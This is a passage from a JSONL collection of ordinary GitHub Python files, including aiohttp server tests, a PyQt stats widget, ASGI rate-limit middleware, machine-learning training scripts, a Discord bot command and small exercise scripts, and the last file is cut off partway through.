nonlocal closed\n closed = True\n srv.connection_lost(None)\n loop.stop()\n\n transport.close = close\n\n srv.connection_made(transport)\n\n handle = srv.handle_request = mock.Mock()\n\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'CONNECTION: keep-alive\\r\\n'\n b'HOST: example.com\\r\\n\\r\\n')\n\n loop.run_forever()\n assert handle.called\n assert closed\n\n\ndef test_keep_alive_close_existing(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(keepalive_timeout=15)\n srv.connection_made(transport)\n\n srv.handle_request = mock.Mock()\n srv.handle_request.return_value = helpers.create_future(loop)\n srv.handle_request.return_value.set_result(1)\n\n srv.data_received(\n b'GET / HTTP/1.0\\r\\n'\n b'HOST: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_srv_process_request_without_timeout(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(timeout=0)\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_keep_alive_timeout_default(srv):\n assert 75 == srv.keepalive_timeout\n\n\ndef test_keep_alive_timeout_nondefault(make_srv):\n srv = make_srv(keepalive_timeout=10)\n assert 10 == srv.keepalive_timeout\n\n\ndef test_keep_alive_timeout_deprecated(make_srv):\n with pytest.warns(DeprecationWarning) as ctx:\n make_srv(keep_alive=10)\n assert len(ctx) == 1\n expected = \"keep_alive is deprecated, use keepalive_timeout instead\"\n assert ctx[0].message.args == (expected,)\n\n\ndef test_keep_alive_timeout_deprecated2(make_srv):\n srv = make_srv(keepalive_timeout=10)\n\n with pytest.warns(DeprecationWarning) as ctx:\n assert 10 == srv.keep_alive_timeout\n assert len(ctx) == 1\n expected = \"Use keepalive_timeout property instead\"\n assert ctx[0].message.args == (expected,)\n\n\ndef test_supports_connect_method(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n with mock.patch.object(srv, 'handle_request') as m_handle_request:\n srv.reader.feed_data(\n b'CONNECT aiohttp.readthedocs.org:80 HTTP/1.0\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert m_handle_request.called\n assert m_handle_request.call_args[0] != (mock.ANY, server.EMPTY_PAYLOAD)\n\n\ndef test_content_length_0(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n with mock.patch.object(srv, 'handle_request') as m_handle_request:\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'Host: example.org\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert m_handle_request.called\n assert m_handle_request.call_args[0] == (mock.ANY, server.EMPTY_PAYLOAD)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/KeepSafe_aiohttp/aiohttp-master/tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":16883,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"20587746014","text":"import math\n\n# a function that prints the distance between two points\ndef distance(x1, y1, x2, y2):\n diffX = x1 - x2\n diffY = y1 - y2\n\n # square our differences\n diffX **= 2\n diffY **= 2\n\n distance = math.sqrt(diffX + diffY)\n print(\"Distance: \", distance)\n\n# invoke the function\ndistance(10, 2, 1, 1)\ndistance(3, 3, 2, 5)\n\n# given a number or items and price, this\n# function will calculate an order total\n\ndef printOrderTotal(numItems, itemPrice, taxRate):\n subTotal = numItems * itemPrice\n taxesOwed = subTotal * taxRate\n total = subTotal + taxesOwed\n\n total = round(total, 2)\n\n print(\"You owe: $\" + str(total))\n\n# buy three surfboards at $59.99\nprintOrderTotal(3, 59.99, 0.098)\n\n# buy five candles at $5.99\nprintOrderTotal(5, 5.99, 0.098)\n","repo_name":"joshbarcher/IT102_Summer2019","sub_path":"8_functions/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10551345251","text":"import math\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import Qt, QRect, QTimer\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton\n\nclass Stats(QWidget):\n \n def __init__(self, parent=None):\n super().__init__(parent)\n self.setGeometry(QRect(960, 0, 240, 960))\n self.setObjectName(\"stats\")\n\n self.background = QLabel(self)\n self.background.setGeometry(QRect(0, 0, self.width(), self.height()))\n self.background.setStyleSheet(\"background-color: #9e9c89;\")\n \n self.timer_label = QLabel(self)\n self.timer_label.setGeometry(QRect(120, 0, 120, 60))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(24)\n self.timer_label.setFont(font)\n self.timer_label.setAlignment(Qt.AlignCenter)\n self.timer_label.setObjectName(\"timer\")\n self.timer_label.setText(\"00:00\")\n\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.update_timer)\n self.time_counter = 0\n self.is_running = False\n self.control_timer()\n\n self.hp_label = QLabel(self)\n self.hp_label.setGeometry(QRect(10, 80, 50, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.hp_label.setFont(font)\n self.hp_label.setObjectName(\"hp_label\")\n self.hp_label.setText(\"HP:\")\n\n self.points_label = QLabel(self)\n self.points_label.setGeometry(QRect(10, 125, 100, 25))\n self.points_label.setFont(font)\n self.points_label.setObjectName(\"points_label\")\n self.points_label.setText(\"Points:\")\n\n self.kills_label = QLabel(self)\n self.kills_label.setGeometry(QRect(10, 170, 90, 25))\n self.kills_label.setFont(font)\n self.kills_label.setObjectName(\"kills_label\")\n self.kills_label.setText(\"Kills:\")\n \n self.weapon_label = QLabel(self)\n self.weapon_label.setGeometry(QRect(10, 215, 100, 25))\n self.weapon_label.setFont(font)\n self.weapon_label.setObjectName(\"weapon_label\")\n self.weapon_label.setText(\"Weapon:\")\n \n self.effects_label = QLabel(self)\n self.effects_label.setGeometry(QRect(10, 280, 110, 25))\n self.effects_label.setFont(font)\n self.effects_label.setObjectName(\"effects_label\")\n self.effects_label.setText(\"Effects:\")\n\n self.hp = QLabel(self)\n self.hp.setGeometry(QRect(0, 100, 240, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.hp.setFont(font)\n self.hp.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.hp.setObjectName(\"hp\")\n self.hp.setText(\"100/100\")\n\n self.points = QLabel(self)\n self.points.setGeometry(QRect(100, 145, 130, 25))\n self.points.setFont(font)\n self.points.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.points.setObjectName(\"points\")\n self.points.setText(\"0\")\n\n self.kills = QLabel(self)\n self.kills.setGeometry(QRect(130, 190, 100, 25))\n self.kills.setFont(font)\n self.kills.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.kills.setObjectName(\"kills\")\n self.kills.setText(\"0\")\n\n self.weapon = QLabel(self)\n self.weapon.setGeometry(QRect(50, 235, 180, 25))\n self.weapon.setFont(font)\n self.weapon.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.weapon.setObjectName(\"weapon\")\n self.weapon.setText(\"Dual Pistol\")\n\n self.ammo = QLabel(self)\n self.ammo.setGeometry(QRect(110, 255, 120, 25))\n self.ammo.setFont(font)\n self.ammo.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.ammo.setObjectName(\"ammo\")\n self.ammo.setText(\"0/0\")\n\n self.reload = QLabel(self)\n self.reload.setGeometry(QRect(40, 255, 90, 25))\n self.reload.setFont(font)\n self.reload.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.reload.setObjectName(\"reload\")\n \n self.effect_1 = QLabel(self)\n self.effect_1.setGeometry(QRect(40, 300, 140, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.effect_1.setFont(font)\n self.effect_1.setAccessibleName(\"\")\n self.effect_1.setObjectName(\"effect_1\")\n self.effect_1.setText(\"Slowdown\")\n\n self.effect_1_value = QLabel(self)\n self.effect_1_value.setGeometry(QRect(90, 300, 140, 25))\n self.effect_1_value.setFont(font)\n self.effect_1_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_1_value.setObjectName(\"effect_1_value\")\n self.effect_1_value.setText(\"0\")\n\n self.effect_2 = QLabel(self)\n self.effect_2.setGeometry(QRect(40, 320, 140, 25))\n self.effect_2.setFont(font)\n self.effect_2.setObjectName(\"effect_2\")\n self.effect_2.setText(\"Speed-Up\")\n\n self.effect_2_value = QLabel(self)\n self.effect_2_value.setGeometry(QRect(90, 320, 140, 25))\n self.effect_2_value.setFont(font)\n self.effect_2_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_2_value.setObjectName(\"effect_2_value\")\n self.effect_2_value.setText(\"0\")\n\n self.effect_3 = QLabel(self)\n self.effect_3.setGeometry(QRect(40, 340, 140, 25))\n self.effect_3.setFont(font)\n self.effect_3.setObjectName(\"effect_3\")\n self.effect_3.setText(\"Freeze\")\n\n self.effect_3_value = QLabel(self)\n self.effect_3_value.setGeometry(QRect(90, 340, 140, 25))\n self.effect_3_value.setFont(font)\n self.effect_3_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_3_value.setObjectName(\"effect_3_value\")\n self.effect_3_value.setText(\"0\")\n\n self.effect_4 = QLabel(self)\n self.effect_4.setGeometry(QRect(40, 360, 140, 25))\n self.effect_4.setFont(font)\n self.effect_4.setObjectName(\"effect_4\")\n self.effect_4.setText(\"Corrosion\")\n\n self.effect_4_value = QLabel(self)\n self.effect_4_value.setGeometry(QRect(90, 360, 140, 25))\n self.effect_4_value.setFont(font)\n self.effect_4_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_4_value.setObjectName(\"effect_4_value\")\n self.effect_4_value.setText(\"0\")\n \n self.effect_5 = QLabel(self)\n self.effect_5.setGeometry(QRect(40, 380, 140, 25))\n self.effect_5.setFont(font)\n self.effect_5.setObjectName(\"effect_5\")\n self.effect_5.setText(\"Collateral\")\n\n self.effect_5_value = QLabel(self)\n self.effect_5_value.setGeometry(QRect(90, 380, 140, 25))\n self.effect_5_value.setFont(font)\n self.effect_5_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_5_value.setObjectName(\"effect_5_value\")\n self.effect_5_value.setText(\"0\")\n\n def control_timer(self):\n if not self.is_running:\n self.is_running = True\n self.timer.start(1000) # Timer will trigger every 1000 ms (1 second)\n else:\n self.is_running = False\n self.timer.stop()\n \n def update_timer(self):\n self.time_counter += 1\n minutes = self.time_counter // 60\n seconds = self.time_counter % 60\n self.timer_label.setText(f\"{minutes:02d}:{seconds:02d}\")\n\n def update_kills(self, kills):\n self.kills.setText(kills.__str__())\n\n def update_points(self, points):\n self.points.setText(points.__str__())\n\n def update_health(self, health, max_health):\n self.hp.setText(f\"{math.ceil(health)}/{math.ceil(max_health)}\")\n\n def update_ammo(self, ammo, max_ammo, reload):\n if reload:\n self.reload.setText(\"Reload\")\n else:\n self.reload.setText(\"\")\n self.ammo.setText(f\"{ammo}/{max_ammo}\")\n\n def update_effects(self, e1, e2, e3, e4, e5):\n self.effect_1_value.setText(f\"{e1}\")\n self.effect_2_value.setText(f\"{e2}\")\n self.effect_3_value.setText(f\"{e3}\")\n self.effect_4_value.setText(f\"{e4}\")\n self.effect_5_value.setText(f\"{e5}\")\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n stats = Stats()\n stats.show()\n sys.exit(app.exec_())\n","repo_name":"Robo-Arena-Team-2-Uni-Tuebingen/Roboarena-Team-2","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13352770261","text":"import asyncio\nimport re\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple\n\nfrom .backends import BaseBackend\nfrom .rule import RULENAMES, Rule\nfrom .types import ASGIApp, Receive, Scope, Send\n\n\ndef _on_blocked(retry_after: int) -> ASGIApp:\n async def default_429(scope: Scope, receive: Receive, send: Send) -> None:\n await send(\n {\n \"type\": \"http.response.start\",\n \"status\": 429,\n \"headers\": [\n (b\"retry-after\", str(retry_after).encode(\"ascii\")),\n ],\n }\n )\n await send({\"type\": \"http.response.body\", \"body\": b\"\", \"more_body\": False})\n\n return default_429\n\n\nclass RateLimitMiddleware:\n \"\"\"\n rate limit middleware\n \"\"\"\n\n def __init__(\n self,\n app: ASGIApp,\n authenticate: Callable[[Scope], Awaitable[Tuple[str, str]]],\n backend: BaseBackend,\n config: Dict[str, Sequence[Rule]],\n *,\n on_auth_error: Optional[Callable[[Exception], Awaitable[ASGIApp]]] = None,\n on_blocked: Callable[[int], ASGIApp] = _on_blocked,\n ) -> None:\n self.app = app\n self.authenticate = authenticate\n self.backend = backend\n\n if not asyncio.iscoroutinefunction(self.authenticate):\n raise ValueError(f\"invalid authenticate function: {self.authenticate}\")\n\n assert isinstance(backend, BaseBackend), f\"invalid backend: {self.backend}\"\n\n self.config: Dict[re.Pattern, Sequence[Rule]] = {\n re.compile(path): value for path, value in config.items()\n }\n\n self.on_auth_error = on_auth_error\n self.on_blocked = on_blocked\n\n async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:\n if scope[\"type\"] != \"http\": # pragma: no cover\n return await self.app(scope, receive, send)\n\n url_path = scope[\"path\"]\n for pattern, rules in self.config.items():\n if not pattern.match(url_path):\n continue\n # After finding the first rule that can match the path,\n # calculate the user ID and group\n try:\n user, group = await self.authenticate(scope)\n except Exception as exc:\n if self.on_auth_error is not None:\n response = await self.on_auth_error(exc)\n return await response(scope, receive, send)\n raise exc\n\n # Select the first rule that can be matched\n method = scope[\"method\"].lower()\n match_rule = list(\n filter(\n lambda r: r.group == group and r.method.lower() in [method, \"*\"],\n rules,\n )\n )\n if match_rule:\n rule = match_rule[0]\n break\n else: # If no rule can match, run `self.app` and return\n return await self.app(scope, receive, send)\n\n if not any(getattr(rule, name) is not None for name in RULENAMES):\n return await self.app(scope, receive, send)\n\n path: str = url_path if rule.zone is None else rule.zone\n retry_after = await self.backend.retry_after(path, user, rule)\n if retry_after == 0:\n return await self.app(scope, receive, send)\n\n return await self.on_blocked(retry_after)(scope, receive, send)\n","repo_name":"abersheeran/asgi-ratelimit","sub_path":"ratelimit/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":244,"dataset":"github-code","pt":"21"} +{"seq_id":"11772360462","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Donny You(youansheng@gmail.com)\n\n\nimport math\nimport numpy as np\nimport torch\n\n\nclass PafGenerator(object):\n\n def __init__(self, configer):\n self.configer = configer\n\n def __call__(self, gt_kpts, input_size, maskmap=None):\n input_width, input_height = input_size\n vec_pair = self.configer.get('details', 'limb_seq')\n stride = self.configer.get('network', 'stride')\n theta = self.configer.get('target.paf.theta')\n width, height = input_width // stride, input_height // stride\n accumulate_vec_map = np.zeros((len(vec_pair) * 2, height, width), dtype=np.float32)\n cnt = np.zeros((len(vec_pair), height, width), dtype=np.int32)\n channel, height, width = cnt.shape\n for j in range(len(gt_kpts)):\n for i in range(channel):\n a = vec_pair[i][0] - 1\n b = vec_pair[i][1] - 1\n if gt_kpts[j][a][2] < 0 or gt_kpts[j][b][2] < 0:\n continue\n\n ax = gt_kpts[j][a][0].item() / stride\n ay = gt_kpts[j][a][1].item() / stride\n bx = gt_kpts[j][b][0].item() / stride\n by = gt_kpts[j][b][1].item() / stride\n\n bax = bx - ax\n bay = by - ay\n # 1e-9 to aviod two points have same position.\n norm_ba = math.sqrt(bax * bax + bay * bay)\n if norm_ba == 0:\n continue\n\n bax /= norm_ba\n bay /= norm_ba\n\n min_w = max(int(round(min(ax, bx) - theta)), 0)\n max_w = min(int(round(max(ax, bx) + theta)), width)\n min_h = max(int(round(min(ay, by) - theta)), 0)\n max_h = min(int(round(max(ay, by) + theta)), height)\n\n range_x = list(range(int(min_w), int(max_w), 1))\n range_y = list(range(int(min_h), int(max_h), 1))\n xx, yy = np.meshgrid(range_x, range_y)\n\n xx = xx.astype(np.uint32)\n yy = yy.astype(np.uint32)\n px = xx - ax # the vector from (x,y) to centerA\n py = yy - ay\n limb_width = np.abs(bax * py - bay * px)\n mask = limb_width < theta # mask is 2D\n\n vec_map = np.zeros((2, height, width), dtype=np.float32)\n vec_map[:, yy, xx] = np.repeat(mask[np.newaxis, :, :], 2, axis=0)\n vec_map[:, yy, xx] *= np.array([bax, bay])[:, np.newaxis, np.newaxis]\n\n mask = np.logical_or(np.abs(vec_map[0:1, :, :]) > 0, np.abs(vec_map[1:2, :, :]) > 0)\n\n accumulate_vec_map[2*i:2*i+2, :, :] = np.multiply(accumulate_vec_map[2*i:2*i+2], cnt[i:i+1, :, :])\n accumulate_vec_map[2*i:2*i+2, :, :] += vec_map\n cnt[i:i+1, :, :][mask == 1] += 1\n mask = cnt[i:i+1, :, :] == 0\n cnt[i:i+1, :, :][mask == 1] = 1\n accumulate_vec_map[2*i:2*i+2, :, :] = np.divide(accumulate_vec_map[2*i:2*i+2, :, :], cnt[i:i+1, :, :])\n cnt[i:i+1, :, :][mask == 1] = 0\n\n vecmap = torch.from_numpy(accumulate_vec_map)\n if maskmap is not None:\n vecmap = vecmap * maskmap\n\n return vecmap\n","repo_name":"donnyyou/torchcv","sub_path":"data/pose/utils/paf_generator.py","file_name":"paf_generator.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"} +{"seq_id":"74121385011","text":"import argparse\nimport yaml\nimport torch\nimport pytorch_lightning as pl\nfrom model.data import IelstDataset, train_val_split\nfrom model.config import get_train_config\nfrom model.model import GPT2Lightning\nfrom model.train import train\n\ndef setup_arg_parser():\n parser = argparse.ArgumentParser('Train')\n parser.add_argument(\"--config\", type=str, \n default=\"config/config.yaml\") \n return parser\n\ndef main(args):\n torch.cuda.empty_cache()\n pl.seed_everything(0)\n \n with open(args.config, 'r') as file:\n config_yaml = yaml.load(file, Loader=yaml.FullLoader)\n config = get_train_config(config_yaml)\n print(config)\n model = GPT2Lightning(config)\n \n dataset = IelstDataset(model.config.data_path,\n max_length=model.config.max_length, padding=True)\n assert model.gpt2.get_input_embeddings().num_embeddings == len(dataset.tokenizer)\n train_set, val_set = train_val_split(dataset, 0.9)\n \n train(model, train_set, val_set)\n \nif __name__==\"__main__\":\n arg_parser = setup_arg_parser()\n args = arg_parser.parse_args()\n main(args)","repo_name":"XuanVuNguyen/ielts_writer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21846356662","text":"# view.py\r\n# By: BentoBot02\r\n# karuta catalog view command\r\n\r\nimport discord\r\nimport os\r\nfrom discord.ext import commands\r\nfrom copy import deepcopy\r\n\r\nimport globalValues\r\n\r\nasync def view(ctx, args):\r\n\r\n if len(args) < 1:\r\n await ctx.channel.send(\"<@\" + str(ctx.author.id) + \">, please input a card code.\")\r\n return\r\n\r\n code = args[0]\r\n code = code.lower()\r\n\r\n \r\n card = await globalValues.catalog.getLiveCatalogCard(code)\r\n\r\n if card == None:\r\n await ctx.channel.send(\"<@\" + str(ctx.author.id) + \">, that card is not in the catalog.\")\r\n return\r\n\r\n descriptionStr = card.getViewStr()\r\n preferredPaymentStr = card.getPaymentStr()\r\n\r\n embedVar = discord.Embed(title=\"Card Details\", description=descriptionStr, color=0x6280D1)\r\n embedVar.add_field(name=\"Preferred Payment:\", value=preferredPaymentStr)\r\n embedVar.set_image(url=card.getImageURL())\r\n await ctx.channel.send(embed=embedVar)","repo_name":"BentoBot02/Karuta-Catalog","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35196076157","text":"# Function to compute features for synapse detection.\n#\n# **Inputs**\n#\n# em: (uint8)\n# - Matrix containing the raw EM dataset of interest.\n#\n# idxToTest: (uint32)\n# - Vector containing a list of linear indices to use in feature extraction and downstream classification.\n#\n# vesicles: (string)\n# - Location of mat file containing a RAMONVolume named cube. The cube contains a binary mask indicating locations of putative neurotransmitter-containing vesicles.\n#\n# **Outputs**\n#\n# xt: (float)\n# - Matrix (NxD) containing features for N idxToTest datapoints and D features.\n#\n\nimport numpy as np\nfrom scipy import ndimage\n\ndef vesiclerf_feats(em):\n #return value\n xt = [] \n num_features = 2\n\n # Kernels\n B0 = np.ones([5,5,1])/(5*5*1)\n B1 = np.ones([15,15,3])/(15*15*3)\n B2 = np.ones([25,25,5])/(25*25*5)\n\n ### Intensity Feats ###\n # find weighted average of features\n I0 = ndimage.convolve(em,B0,mode='constant')\n I2 = ndimage.convolve(em,B1,mode='constant')\n\n # reshape data\n # I0 = [np.reshape(I0,(I0.size,1)).tolist(), num_features]\n # I2 = [np.reshape(I2,(I2.size,1)).tolist(), num_features]\n # I0 = np.reshape(I0,(I0.size,1))\n I2 = np.reshape(I2,(I2.size,1))\n xt = I2\n #xt.append(I0)\n #xt.append(I2)\n\n return xt","repo_name":"Connectomics-Classes/team-awesome","sub_path":"vesiclerf_feats.py","file_name":"vesiclerf_feats.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15926529981","text":"# Defining a Function\r\n\r\ndef lex(series, n, ini='', seq=[]):\r\n if n == 0:\r\n seq.append(ini)\r\n else:\r\n for c in series:\r\n lex(series, n - 1, ini + c, seq)\r\n return seq\r\n\r\n# Run\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n D = open('rosalind_lexf.txt').read()\r\n Data = D.split()\r\n series = Data[:-1]\r\n n = int(Data[-1])\r\n\r\n for i in lex(series, n):\r\n print(i)\r\n\r\n","repo_name":"Mockingbird2k/BioInformatic-Assignments","sub_path":"BioInformatic Assignments (Rosalind)/Enumerating k-mers Lexicographically (lexf).py","file_name":"Enumerating k-mers Lexicographically (lexf).py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33687559030","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass FocalLoss(nn.Module):\n \"Focal loss implemented using F.cross_entropy\"\n def __init__(self, gamma: float = 2.0, weight=None, reduction: str = 'mean') -> None:\n super().__init__()\n self.gamma = gamma\n self.weight = weight\n self.reduction = reduction\n\n\n def forward(self, inp: torch.Tensor, targ: torch.Tensor):\n ce_loss = F.cross_entropy(inp, targ, weight=self.weight, reduction=\"none\")\n p_t = torch.exp(-ce_loss)\n loss = (1 - p_t)**self.gamma * ce_loss\n if self.reduction == \"mean\":\n loss = loss.mean()\n elif self.reduction == \"sum\":\n loss = loss.sum()\n return loss\n\nif __name__ == \"__main__\":\n print()","repo_name":"LucaRom/deep_mh","sub_path":"custom_loss.py","file_name":"custom_loss.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11905956451","text":"# This Script will hold our LIDAR DATAS\nimport rospy\nfrom sensor_msgs.msg import LaserScan\n \n# This function takes the LIDAR datas and make them sense\ndef lidar_data(veri):\n\n # to make sense data we created a dictionary which is name areas\n # we added a jpg file to our project that it shows how we created areas with these degrees\n areas = {\n 'front1': min(min(veri.ranges[0:9]), 3.5),\n 'front2': min(min(veri.ranges[349:359]), 3.5),\n 'front_left': min(min(veri.ranges[10:49]), 3.5),\n 'left': min(min(veri.ranges[50:89]), 3.5),\n 'back': min(min(veri.ranges[90:268]), 3.5),\n 'right': min(min(veri.ranges[269:308]), 3.5),\n 'front_right': min(min(veri.ranges[309:348]), 3.5),\n }\n \n print (areas)\n \n# In this main function we initialized our node which is name tb3_lidar\nif __name__ == '__main__':\n \n rospy.init_node('tb3_lidar',anonymous=True)\n \n# To geting the LIDAR datas we initialized our Topic name\n rospy.Subscriber('/scan', LaserScan, lidar_data)\n# We have callback so we called spin method\n rospy.spin()\n","repo_name":"kaanoztekin99/turtlebot3_Line_Tracking","sub_path":"scripts/tb3_lidar.py","file_name":"tb3_lidar.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25135968335","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom esmigrate.commons import local_config_file_path, user_config_file_path\nfrom esmigrate.contexts import ContextConfig\nfrom esmigrate.exceptions import (\n InvalidSchemaPatternError,\n UserProfileNotFoundError,\n)\n\n\ndef test_context_fails_with_invalid_schema_pattern_error(monkeypatch):\n \"\"\"Test fails if ContextConfig can be instantiated with invalid pattern set via env variable\"\"\"\n monkeypatch.setenv(\"SCHEMA_PATTERN\", \"some illegal pattern\")\n with pytest.raises(InvalidSchemaPatternError):\n ContextConfig()\n\n\ndef test_context_fails_with_user_profile_not_found_error():\n \"\"\"Test fails if requested profile is not available in any configuration file\"\"\"\n with pytest.raises(UserProfileNotFoundError):\n ContextConfig().load_for(\"some-profile\")\n\n\ndef test_context_silently_skips_invalid_json_in_load_order(monkeypatch, fs):\n \"\"\"Test fails if context loader cannot load configuration files silently in order\"\"\"\n monkeypatch.setenv(\"ESMIGRATE_CONFIG\", \"/tmp/elastic-migrate/config.json\")\n fs.create_file(\"/tmp/elastic-migrate/config.json\", contents=\"\"\"not a json\"\"\")\n fs.create_file(\n user_config_file_path,\n contents=\"\"\"{\"profiles\":[{\"test\":{\"schema_ext\": \".exm1\", \"schema_dir\": \"dir1\"}}]}\"\"\",\n )\n fs.create_file(\n local_config_file_path,\n contents=\"\"\"{\"profiles\":[{\"test\":{\"schema_ext\": \".exm2\", \"elastic_host\": \"http://127.0.0.1:9200\"}}]}\"\"\",\n )\n context = ContextConfig().load_for(\"test\")\n assert context.profile == \"test\"\n assert context.schema_dir == \"dir1\"\n assert context.schema_ext == \".exm2\"\n assert context.es_host == \"http://127.0.0.1:9200\"\n","repo_name":"zobayer1/elastic-migrate","sub_path":"tests/test_contexts/test_context_config.py","file_name":"test_context_config.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37927916241","text":"# metal_binding_classifier\n\nimport os\n#os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n\n#import the tools\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader, WeightedRandomSampler\nfrom torch.utils.data import RandomSampler, SequentialSampler\nimport torchvision\nfrom torchvision import datasets, transforms\nimport torchmetrics as metrics\nimport random\nimport time\nimport datetime\n\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\n\n##------ nets ----------------------------\nfrom .models import alphafold\n\n##------ dataset -------------------------\nfrom .metal_binding_classifier import *\n\nimport statistics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import classification_report, roc_auc_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\n\n# set up paths (update your paths here)\n\n# PROJ_PATH = '/home/ybwu/projects/Protein/testing/mbc/'\n# DATA_PATH = PROJ_PATH + 'input/'\n# out_dir = '/home/ybwu/projects/Protein/testing/mbc/Aug1221_AF1/'\n\n#BATCH_SIZE = 16\n#EPOCHS = 20\n\ndef train_model(foldno, train_df, valid_df, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n \n #Sample weight\n from collections import Counter\n y_train = train_df.label.values.astype(int)\n count=Counter(y_train)\n class_count=np.array([count[0],count[1]])\n weight=1./class_count\n weight=weight/sum(weight)\n print(\"class weight:\", weight)\n #weight = [1.0, 1.0]\n \n #samples_weight = np.array([weight[t] for t in y_train])\n #samples_weight=torch.from_numpy(samples_weight)\n #sampler = WeightedRandomSampler(samples_weight, len(samples_weight))\n \n # Create datasets and dataloaders\n train_set = image_set(train_df, DATA_PATH, mode='train')\n train_loader = DataLoader(\n train_set, \n sampler = RandomSampler(train_set),\n batch_size = BATCH_SIZE,\n drop_last = True, \n # shuffle = True,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n \n valid_set = image_set(valid_df, DATA_PATH, mode='valid')\n valid_loader = DataLoader(\n valid_set,\n sampler = SequentialSampler(valid_set), \n batch_size = BATCH_SIZE, \n drop_last = False,\n # shuffle=False,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n \n print(\"len of train_loader:\", len(train_loader))\n print(\"len of valid_loader:\", len(valid_loader))\n\n # Setting up GPU\n #device = torch.device('cuda:0' if torch.cuda.is_available else 'cpu')\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # build the model\n model = alphafold.AlphafoldNet()\n model= model.to(device)\n \n # cost_function\n cost_function = nn.BCELoss() \n \n # optimizer\n optimizer = optim.Adam([param for 